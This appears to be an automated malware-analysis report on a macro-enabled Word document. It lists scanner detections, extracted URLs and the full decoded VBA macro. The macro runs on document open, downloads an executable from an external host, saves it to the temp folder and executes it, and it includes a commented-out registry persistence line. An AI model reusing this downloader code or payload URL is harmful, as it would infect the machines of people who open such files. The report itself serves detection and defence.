MALICIOUS
550
Risk Score
Heuristics 12
-
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
-
VBA project inside OOXML medium 8 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell fPath -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set Reg = CreateObject("Wscript.shell") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set Reg = CreateObject("Wscript.shell") -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub Document_Open() -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set Reg = CreateObject("Wscript.shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Reg = CreateObject("Wscript.shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://stmonline.com.au/IUWJWRCN.exe Referenced by macro
- http://stmonline.com.au/IUnReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/drawing/2010/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/tiff/1.0/Referenced by macro
- http://ns.adobe.com/exif/1.0/Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2368 bytes |
SHA-256: 4e6cf48040c68ea5e1ef7953960243d74e5a1ba9e7cbf645e127a7db61f1a16b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function URLDownloadToCacheFile Lib "urlmon" Alias "URLDownloadToCacheFileA" (ByVal lpUnkcaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwBufLength As Long, ByVal dwReserved As Long, ByVal IBindStatusCallback As Long) As Long
Private Declare Function GetTempPath _
Lib "kernel32" Alias "GetTempPathA" _
(ByVal nBufferLength As Long, _
ByVal lpBuffer As String) As Long
Private Const MAX_PATH As Long = 260
Function DownloadFile(URL As String) As String
Dim szFileName As String
szFileName = Space$(300)
If URLDownloadToCacheFile(0, URL, szFileName, Len(szFileName), 0, 0) = 0 Then DownloadFile = Trim(szFileName)
End Function
Function TempPath() As String
TempPath = String$(MAX_PATH, Chr$(0))
GetTempPath MAX_PATH, TempPath
TempPath = Replace(TempPath, Chr$(0), "")
End Function
Private Sub Document_Open()
DoWork
End Sub
Sub DoWork()
Dim tmp As String, fName As String, Pos As Long, fPath As String
tmp = DownloadFile("http://stmonline.com.au/IUWJWRCN.exe")
fName = "IUWJWRCN.exe"
fPath = TempPath & fName
FileCopy tmp, fPath
Kill tmp
'STARTUP
Dim Reg As Object
Set Reg = CreateObject("Wscript.shell")
'Reg.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & fName, fPath
Shell fPath
End
Exit Sub
End Sub
Public Function RC4Decrypt(text, encryptkey)
Dim sbox(256) As Integer
Dim Key(256) As Integer
Dim Text2 As String
Dim Temp As Integer
Dim a As Long
Dim i As Integer
Dim j As Integer
Dim k As Long
Dim w As Integer
Dim cipherby As Integer
Dim cipher As String
For w = 1 To Len(text) Step 2
Text2 = Text2 & Chr(Dec(Mid$(text, w, 2)))
Next
i = 0
j = 0
RC4Initialize encryptkey, Key, sbox
For a = 1 To Len(Text2)
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
Temp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = Temp
k = sbox((sbox(i) + sbox(j)) Mod 256)
cipherby = Asc(Mid$(Text2, a, 1)) Xor k
cipher = cipher & Chr(cipherby)
Next
RC4Decrypt = cipher
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes |
SHA-256: e123303b405e85257b723b843ebcebda2fa6eb65f5fca022bbe0c4218d88b557 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6412232-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.